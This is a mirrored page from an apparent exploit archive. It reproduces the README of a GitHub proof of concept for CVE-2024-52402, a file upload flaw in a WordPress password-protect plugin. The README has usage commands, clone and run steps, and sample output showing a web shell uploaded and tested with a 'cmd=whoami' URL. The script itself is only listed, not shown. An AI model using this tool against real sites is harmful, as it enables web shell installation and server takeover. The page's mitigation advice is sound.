关联漏洞
描述
WordPress Exclusive Content Password Protect plugin <= 1.1.0 - CSRF to Arbitrary File Upload vulnerability
介绍
# 🚀 Exploit for CVE-2024-52402: WordPress Exclusive Content Password Protect Plugin <= 1.1.0
## 🛡️ Overview
This exploit targets a Cross-Site Request Forgery (CSRF) vulnerability in the WordPress Exclusive Content Password Protect plugin, versions up to and including 1.1.0. This vulnerability allows an attacker to upload a web shell to the web server, leading to potential remote code execution.
### 📅 Details
- **Published:** 2024-11-19
- **CVE ID:** CVE-2024-52402
- **Plugin Version:** Exclusive Content Password Protect <= 1.1.0
- **Severity:** CRITICAL (CVSS 9.6)
## ⚙️ Usage
To exploit this vulnerability, you need to provide the target WordPress site URL, a valid WordPress username, and password. The exploit script will log in to the WordPress site and attempt to upload a web shell.
### 🔧 Command
```sh
python CVE-2024-52402.py -u <target> -un <username> -p <password>
```
### 🛠️ Options
```
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
```
### 🌟 Example
```sh
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
```
## 🚀 Output Example
```sh
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami
```
## 📜 Description
This script exploits the CSRF vulnerability in the Exclusive Content Password Protect plugin to upload a Web Shell
to the WordPress server. However, it does not execute a CSRF attack
directly; instead, it focuses on leveraging the plugin’s file upload
functionality to achieve exploitation.
## 👨💻 How to Run the Script
1. **Clone the Repository**
```sh
git clone https://github.com/Nxploited/CVE-2024-52402.git
cd CVE-2024-52402
```
2. **Install Requirements**
Ensure you have `requests` library installed:
```sh
pip install requests
```
3. **Run the Script**
Use the following command to execute the script:
```sh
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
```
## 🛡️ Mitigation
To mitigate this vulnerability, update the Exclusive Content Password Protect plugin to the latest version where this issue has been fixed.
## ⚠️ Disclaimer
This script is intended for educational purposes only. Unauthorized use of this script against systems that you do not have explicit permission to test is illegal and unethical.
***Exploit By: Nxploit , Khaled alenazi.***
文件快照
[4.0K] /data/pocs/44d972dcfe3a13c84c8363aab6c60bd50460d0f0
├── [3.7K] CVE-2024-52402.py
└── [2.8K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。